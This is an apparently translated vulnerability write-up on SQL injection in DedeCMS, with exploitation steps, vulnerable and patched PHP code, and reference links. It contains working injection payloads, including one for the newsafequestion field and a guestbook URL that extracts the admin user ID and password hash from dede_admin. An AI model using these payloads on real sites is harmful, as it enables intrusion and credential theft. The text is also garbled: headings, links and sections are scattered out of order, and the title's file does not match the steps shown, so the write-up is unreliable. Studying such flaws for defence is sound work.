
dedecms /member/uploads_edit.php SQL Injection Vul

/member/uploads_edit.php

1. Register a user and log in.
2. Open http://127.0.0.1/dedecms5.5/member/edit_baseinfo.php
3. After filling in the form, enter the captcha, click submit, and capture the request with Burp.
4. In Burp, change the value of newsafequestion to: 1',email=@`'`,uname=(select user()),email='sss
5. Submit the request, then open http://127.0.0.1/dedecms5.5/member/edit_baseinfo.php again.
6. You will see that your username has become the result of the injection.

```
/plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `dede_admin` LIMIT 0,1),email='
```

**dedecms /member/uploads_edit.php SQL Injection Vul**

*Copyright (c) 2015 LittleHann All rights reserved*

dedecms /member/uploads_edit.php SQL Injection Vul: a SQL injection present in the member module.

1. PHP magic_quotes_gpc=off
2. The vulnerable file exists: plus/guestbook.php
3. The table dede_guestbook must also exist in the database

```php
function SaveUploadInfo($title,$filename,$medaitype=1,$addinfos='')
{
    global $dsql,$cfg_ml,$cfg_basedir;
    if($filename=='')
    {
        return false;
    }
    if(!is_array($addinfos))
    {
        $addinfos[0] = $addinfos[1] = $addinfos[2] = 0;
    }
    if($medaitype==1)
    {
        $info = '';
        $addinfos = GetImageSize($cfg_basedir.$filename,$info);
    }
    $addinfos[2] = @filesize($cfg_basedir.$filename);
    $row = $dsql->GetOne("Select aid,title,url From `dede_uploads` where url like '$filename' And mid='".$cfg_ml->M_ID."'; ");
    $uptime = time();
    if(is_array($row))
    {
        $query = "Update `dede_uploads` set title='$title',mediatype='$medaitype',
                  width='{$addinfos[0]}',height='{$addinfos[1]}',filesize='{$addinfos[2]}',uptime='$uptime'
                  where aid='{$row['aid']}'; ";
        $dsql->ExecuteNoneQuery($query);
    }
    else
    {
        // $filename is concatenated into the SQL query without any filtering, causing SQL injection
        $inquery = "INSERT INTO `dede_uploads`(title,url,mediatype,width,height,playtime,filesize,uptime,mid)
           VALUES ('$title','$filename','$medaitype','".$addinfos[0]."','".$addinfos[1]."','0','".$addinfos[2]."','$uptime','".$cfg_ml->M_ID."'); ";
        $dsql->ExecuteNoneQuery($inquery);
    }
    return true;
}
```

**Relevant Link:**

1. Vulnerability description

2. Trigger conditions

http://www.programgo.com/article/45492569994/
http://www.cnblogs.com/Hkadmin/p/3712667.html

member/inc/inc_archives_functions.php

/member/edit_baseinfo.php

3. Scope of impact

Catalog

1. Vulnerability description
2. Trigger conditions
3. Scope of impact
4. Vulnerable code analysis
5. Defenses
6. Attack and defense considerations

http://www.wooyun.org/bugs/wooyun-2014-048873

http://pannisec.diandian.com/?tag=SQL注射


http://www.grabsun.com/article/2015/1216455.html

6. Attack and defense considerations



**Relevant Link:**

```php
else if($dopost=='save')
{
    $title = HtmlReplace($title,2);
    if($mediatype==1) $utype = 'image';
    else if($mediatype==2)
    {
        $utype = 'flash';
    }
    else if($mediatype==3)
    {
        $utype = 'media';
    }
    else
    {
        $utype = 'addon';
    }
    $title = HtmlReplace($title, 2);
    /* Filter $oldurl properly before use */
    $oldurl = HtmlReplace($oldurl);
    /* */
    $exname = preg_replace("#(.*)/#", "", $oldurl);
    $exname = preg_replace("#\.(.*)$#", "", $exname);
    $filename = MemberUploads('addonfile', $oldurl, $cfg_ml->M_ID, $utype,$exname, -1, -1, TRUE);
    SaveUploadInfo($title, $filename, $mediatype);
    ShowMsg("成功修改文件!", "uploads_edit.php?aid=$aid");
}
```

**Relevant Link:**

The conditions for a successful injection attack are as follows:

http://cve.scap.org.cn/CVE-2009-2270.html
http://www.cnnvd.org.cn/vulnerability/show/cv_id/2009070008

```php
else if($job=='editok')
{
    $remsg = trim($remsg);
    /* Check $g_isadmin */
    if($remsg!='')
    {
        // Admin replies are not HTML-filtered
        if($g_isadmin)
        {
            $msg = "<div class=\'rebox\'>".$msg."</div>\n".$remsg;
            //$remsg <br><font color=red>Admin reply:</font>
        }
        else
        {
            $row = $dsql->GetOne("SELECT msg From `dede_guestbook` WHERE id='$id' ");
            $oldmsg = "<div class=\'rebox\'>".addslashes($row['msg'])."</div>\n";
            $remsg = trimMsg(cn_substrR($remsg, 1024), 1);
            $msg = $oldmsg.$remsg;
        }
    }
    /* */
    /* Filter $msg properly before it reaches the query */
    $msg = addslashes($msg);
    /* */
    $dsql->ExecuteNoneQuery("UPDATE `dede_guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");
    ShowMsg("成功更改或回复一条留言!", $GUEST_BOOK_POS);
    exit();
}
```
